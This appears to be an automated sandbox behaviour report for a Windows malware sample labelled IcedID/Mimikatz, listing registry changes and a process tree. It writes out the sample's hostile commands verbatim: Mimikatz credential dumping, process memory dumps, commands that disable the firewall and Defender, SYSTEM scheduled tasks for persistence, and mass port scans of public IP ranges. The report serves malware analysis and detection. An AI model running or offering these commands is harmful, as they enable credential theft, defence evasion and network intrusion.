\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump itmzphybw.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" eluybcv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" itmzphybw.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" itmzphybw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump itmzphybw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump itmzphybw.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" itmzphybw.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" itmzphybw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump itmzphybw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump itmzphybw.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" eluybcv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals itmzphybw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump itmzphybw.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing itmzphybw.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" itmzphybw.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" itmzphybw.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" eluybcv.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" eluybcv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" eluybcv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" eluybcv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" eluybcv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ eluybcv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" eluybcv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" eluybcv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ eluybcv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ eluybcv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" eluybcv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ eluybcv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ eluybcv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ eluybcv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ eluybcv.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1188 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found 660 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 3892 2024-04-23_f756695fc343370a52043a477ebc7625_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 3892 2024-04-23_f756695fc343370a52043a477ebc7625_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 3356 eluybcv.exe Token: SeDebugPrivilege 4108 eluybcv.exe Token: SeDebugPrivilege 4312 vfshost.exe Token: SeDebugPrivilege 4552 itmzphybw.exe Token: SeLockMemoryPrivilege 552 ytnkip.exe Token: SeLockMemoryPrivilege 552 ytnkip.exe Token: SeDebugPrivilege 3764 itmzphybw.exe Token: SeDebugPrivilege 4360 itmzphybw.exe Token: SeDebugPrivilege 3992 itmzphybw.exe Token: SeDebugPrivilege 896 itmzphybw.exe Token: SeDebugPrivilege 1464 itmzphybw.exe Token: SeDebugPrivilege 3456 itmzphybw.exe Token: SeDebugPrivilege 3800 itmzphybw.exe Token: SeDebugPrivilege 1628 itmzphybw.exe Token: SeDebugPrivilege 4692 itmzphybw.exe Token: SeDebugPrivilege 760 itmzphybw.exe Token: SeDebugPrivilege 5004 itmzphybw.exe Token: SeDebugPrivilege 3928 itmzphybw.exe Token: SeDebugPrivilege 3356 itmzphybw.exe Token: SeDebugPrivilege 3616 itmzphybw.exe Token: SeDebugPrivilege 396 itmzphybw.exe Token: SeDebugPrivilege 3132 itmzphybw.exe Token: SeDebugPrivilege 232 itmzphybw.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 3892 2024-04-23_f756695fc343370a52043a477ebc7625_hacktools_icedid_mimikatz.exe 3892 2024-04-23_f756695fc343370a52043a477ebc7625_hacktools_icedid_mimikatz.exe 3356 eluybcv.exe 3356 eluybcv.exe 4108 eluybcv.exe 4108 eluybcv.exe 4516 xohudmc.exe 2240 ogmqci.exe 1244 eluybcv.exe 1244 eluybcv.exe 6800 eluybcv.exe 6800 eluybcv.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3892 wrote to memory of 4904 3892 2024-04-23_f756695fc343370a52043a477ebc7625_hacktools_icedid_mimikatz.exe 89 PID 3892 wrote to memory of 4904 3892 2024-04-23_f756695fc343370a52043a477ebc7625_hacktools_icedid_mimikatz.exe 89 PID 3892 wrote to memory of 4904 3892 2024-04-23_f756695fc343370a52043a477ebc7625_hacktools_icedid_mimikatz.exe 89 PID 4904 wrote to memory of 1188 4904 cmd.exe 91 PID 4904 wrote to memory of 1188 4904 cmd.exe 91 PID 4904 wrote to memory of 1188 4904 cmd.exe 91 PID 4904 wrote to memory of 3356 4904 cmd.exe 95 PID 4904 wrote to memory of 3356 4904 cmd.exe 95 PID 4904 wrote to memory of 3356 4904 cmd.exe 95 PID 4108 wrote to memory of 3000 4108 eluybcv.exe 97 PID 4108 wrote to memory of 3000 4108 eluybcv.exe 97 PID 4108 wrote to memory of 3000 4108 eluybcv.exe 97 PID 3000 wrote to memory of 1720 3000 cmd.exe 99 PID 3000 wrote to memory of 1720 3000 cmd.exe 99 PID 3000 wrote to memory of 1720 3000 cmd.exe 99 PID 3000 wrote to memory of 1812 3000 cmd.exe 100 PID 3000 wrote to memory of 1812 3000 cmd.exe 100 PID 3000 wrote to memory of 1812 3000 cmd.exe 100 PID 3000 wrote to memory of 1748 3000 cmd.exe 101 PID 3000 wrote to memory of 1748 3000 cmd.exe 101 PID 3000 wrote to memory of 1748 3000 cmd.exe 101 PID 3000 wrote to memory of 3992 3000 cmd.exe 102 PID 3000 wrote to memory of 3992 3000 cmd.exe 102 PID 3000 wrote to memory of 3992 3000 cmd.exe 102 PID 3000 wrote to memory of 1932 3000 cmd.exe 103 PID 3000 wrote to memory of 1932 3000 cmd.exe 103 PID 3000 wrote to memory of 1932 3000 cmd.exe 103 PID 3000 wrote to memory of 1096 3000 cmd.exe 104 PID 3000 wrote to memory of 1096 3000 cmd.exe 104 PID 3000 wrote to memory of 1096 3000 cmd.exe 104 PID 4108 wrote to memory of 3904 4108 eluybcv.exe 105 PID 4108 wrote to memory of 3904 4108 eluybcv.exe 105 PID 4108 wrote to memory of 3904 4108 eluybcv.exe 105 PID 4108 wrote to memory of 2124 4108 eluybcv.exe 107 PID 4108 wrote to memory of 2124 4108 eluybcv.exe 107 PID 4108 wrote to memory of 2124 4108 eluybcv.exe 107 PID 4108 wrote to memory of 3424 4108 eluybcv.exe 109 PID 4108 wrote to memory of 3424 4108 eluybcv.exe 109 PID 4108 wrote to memory of 3424 4108 eluybcv.exe 109 PID 4108 wrote to memory of 4080 4108 eluybcv.exe 118 PID 4108 wrote to memory of 4080 4108 eluybcv.exe 118 PID 4108 wrote to memory of 4080 4108 eluybcv.exe 118 PID 4080 wrote to memory of 4408 4080 cmd.exe 120 PID 4080 wrote to memory of 4408 4080 cmd.exe 120 PID 4080 wrote to memory of 4408 4080 cmd.exe 120 PID 4408 wrote to memory of 4656 4408 wpcap.exe 121 PID 4408 wrote to memory of 4656 4408 wpcap.exe 121 PID 4408 wrote to memory of 4656 4408 wpcap.exe 121 PID 4656 wrote to memory of 4472 4656 net.exe 123 PID 4656 wrote to memory of 4472 4656 net.exe 123 PID 4656 wrote to memory of 4472 4656 net.exe 123 PID 4408 wrote to memory of 3748 4408 wpcap.exe 124 PID 4408 wrote to memory of 3748 4408 wpcap.exe 124 PID 4408 wrote to memory of 3748 4408 wpcap.exe 124 PID 3748 wrote to memory of 2984 3748 net.exe 126 PID 3748 wrote to memory of 2984 3748 net.exe 126 PID 3748 wrote to memory of 2984 3748 net.exe 126 PID 4408 wrote to memory of 4676 4408 wpcap.exe 127 PID 4408 wrote to memory of 4676 4408 wpcap.exe 127 PID 4408 wrote to memory of 4676 4408 wpcap.exe 127 PID 4676 wrote to memory of 2920 4676 net.exe 129 PID 4676 wrote to memory of 2920 4676 net.exe 129 PID 4676 wrote to memory of 2920 4676 net.exe 129 PID 4408 wrote to memory of 4052 4408 wpcap.exe 130
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2220
-
C:\Windows\TEMP\tbstnnzwu\ytnkip.exe"C:\Windows\TEMP\tbstnnzwu\ytnkip.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:552
-
-
C:\Users\Admin\AppData\Local\Temp\2024-04-23_f756695fc343370a52043a477ebc7625_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-04-23_f756695fc343370a52043a477ebc7625_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3892 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\rtibeyhl\eluybcv.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4904 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:1188
-
-
C:\Windows\rtibeyhl\eluybcv.exeC:\Windows\rtibeyhl\eluybcv.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3356
-
-
-
C:\Windows\rtibeyhl\eluybcv.exeC:\Windows\rtibeyhl\eluybcv.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4108 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1720
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:1812
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1748
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:3992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1932
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:1096
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵PID:3904
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵PID:2124
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵PID:3424
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\kzgykqvgq\itzyefabz\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:4080 -
C:\Windows\kzgykqvgq\itzyefabz\wpcap.exeC:\Windows\kzgykqvgq\itzyefabz\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4408 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:4656 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:4472
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:3748 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:2984
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:4676 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:2920
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:4052
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:4360
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:1484
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:4652
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:2960
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:2880
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:2240
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:3856
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\kzgykqvgq\itzyefabz\giqnzllmh.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\kzgykqvgq\itzyefabz\Scant.txt2⤵PID:2688
-
C:\Windows\kzgykqvgq\itzyefabz\giqnzllmh.exeC:\Windows\kzgykqvgq\itzyefabz\giqnzllmh.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\kzgykqvgq\itzyefabz\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:4668
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\kzgykqvgq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\kzgykqvgq\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:4464 -
C:\Windows\kzgykqvgq\Corporate\vfshost.exeC:\Windows\kzgykqvgq\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4312
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "pviabmkub" /ru system /tr "cmd /c C:\Windows\ime\eluybcv.exe"2⤵PID:3356
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3764
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "pviabmkub" /ru system /tr "cmd /c C:\Windows\ime\eluybcv.exe"3⤵
- Creates scheduled task(s)
PID:4212
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "lamiruypa" /ru system /tr "cmd /c echo Y|cacls C:\Windows\rtibeyhl\eluybcv.exe /p everyone:F"2⤵PID:1812
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:368
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "lamiruypa" /ru system /tr "cmd /c echo Y|cacls C:\Windows\rtibeyhl\eluybcv.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:3156
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "nlblnpbab" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\tbstnnzwu\ytnkip.exe /p everyone:F"2⤵PID:1748
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:4972
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "nlblnpbab" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\tbstnnzwu\ytnkip.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:3880
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵PID:4044
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵PID:392
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:4088
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:3596
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵PID:2688
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵PID:228
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:3636
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:1792
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵PID:2960
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵PID:5104
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:3424
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:4628
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵PID:1748
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵PID:2240
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:1976
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:1812
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
PID:1096
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵PID:3284
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:4384
-
-
-
C:\Windows\TEMP\kzgykqvgq\itmzphybw.exeC:\Windows\TEMP\kzgykqvgq\itmzphybw.exe -accepteula -mp 776 C:\Windows\TEMP\kzgykqvgq\776.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4552
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵PID:5044
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵PID:4904
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵PID:4972
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵PID:1396
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵PID:3424
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:2944
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵PID:4656
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:3928
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵PID:732
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵PID:1172
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
PID:2440
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵PID:2688
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:4212
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵PID:2600
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:4584
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵PID:3040
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
PID:1752
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:4516
-
-
C:\Windows\TEMP\kzgykqvgq\itmzphybw.exeC:\Windows\TEMP\kzgykqvgq\itmzphybw.exe -accepteula -mp 316 C:\Windows\TEMP\kzgykqvgq\316.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3764
-
-
C:\Windows\TEMP\kzgykqvgq\itmzphybw.exeC:\Windows\TEMP\kzgykqvgq\itmzphybw.exe -accepteula -mp 2220 C:\Windows\TEMP\kzgykqvgq\2220.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4360
-
-
C:\Windows\TEMP\kzgykqvgq\itmzphybw.exeC:\Windows\TEMP\kzgykqvgq\itmzphybw.exe -accepteula -mp 2528 C:\Windows\TEMP\kzgykqvgq\2528.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3992
-
-
C:\Windows\TEMP\kzgykqvgq\itmzphybw.exeC:\Windows\TEMP\kzgykqvgq\itmzphybw.exe -accepteula -mp 2636 C:\Windows\TEMP\kzgykqvgq\2636.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:896
-
-
C:\Windows\TEMP\kzgykqvgq\itmzphybw.exeC:\Windows\TEMP\kzgykqvgq\itmzphybw.exe -accepteula -mp 2848 C:\Windows\TEMP\kzgykqvgq\2848.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1464
-
-
C:\Windows\TEMP\kzgykqvgq\itmzphybw.exeC:\Windows\TEMP\kzgykqvgq\itmzphybw.exe -accepteula -mp 688 C:\Windows\TEMP\kzgykqvgq\688.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3456
-
-
C:\Windows\TEMP\kzgykqvgq\itmzphybw.exeC:\Windows\TEMP\kzgykqvgq\itmzphybw.exe -accepteula -mp 3712 C:\Windows\TEMP\kzgykqvgq\3712.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3800
-
-
C:\Windows\TEMP\kzgykqvgq\itmzphybw.exeC:\Windows\TEMP\kzgykqvgq\itmzphybw.exe -accepteula -mp 3804 C:\Windows\TEMP\kzgykqvgq\3804.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1628
-
-
C:\Windows\TEMP\kzgykqvgq\itmzphybw.exeC:\Windows\TEMP\kzgykqvgq\itmzphybw.exe -accepteula -mp 3868 C:\Windows\TEMP\kzgykqvgq\3868.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4692
-
-
C:\Windows\TEMP\kzgykqvgq\itmzphybw.exeC:\Windows\TEMP\kzgykqvgq\itmzphybw.exe -accepteula -mp 3944 C:\Windows\TEMP\kzgykqvgq\3944.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:760
-
-
C:\Windows\TEMP\kzgykqvgq\itmzphybw.exeC:\Windows\TEMP\kzgykqvgq\itmzphybw.exe -accepteula -mp 2596 C:\Windows\TEMP\kzgykqvgq\2596.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5004
-
-
C:\Windows\TEMP\kzgykqvgq\itmzphybw.exeC:\Windows\TEMP\kzgykqvgq\itmzphybw.exe -accepteula -mp 3500 C:\Windows\TEMP\kzgykqvgq\3500.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3928
-
-
C:\Windows\TEMP\kzgykqvgq\itmzphybw.exeC:\Windows\TEMP\kzgykqvgq\itmzphybw.exe -accepteula -mp 64 C:\Windows\TEMP\kzgykqvgq\64.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3356
-
-
C:\Windows\TEMP\kzgykqvgq\itmzphybw.exeC:\Windows\TEMP\kzgykqvgq\itmzphybw.exe -accepteula -mp 4872 C:\Windows\TEMP\kzgykqvgq\4872.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3616
-
-
C:\Windows\TEMP\kzgykqvgq\itmzphybw.exeC:\Windows\TEMP\kzgykqvgq\itmzphybw.exe -accepteula -mp 3348 C:\Windows\TEMP\kzgykqvgq\3348.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:396
-
-
C:\Windows\TEMP\kzgykqvgq\itmzphybw.exeC:\Windows\TEMP\kzgykqvgq\itmzphybw.exe -accepteula -mp 3400 C:\Windows\TEMP\kzgykqvgq\3400.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3132
-
-
C:\Windows\TEMP\kzgykqvgq\itmzphybw.exeC:\Windows\TEMP\kzgykqvgq\itmzphybw.exe -accepteula -mp 2284 C:\Windows\TEMP\kzgykqvgq\2284.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:232
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\kzgykqvgq\itzyefabz\scan.bat2⤵PID:2960
-
C:\Windows\kzgykqvgq\itzyefabz\egyqtzwap.exeegyqtzwap.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:4772
-
-
-
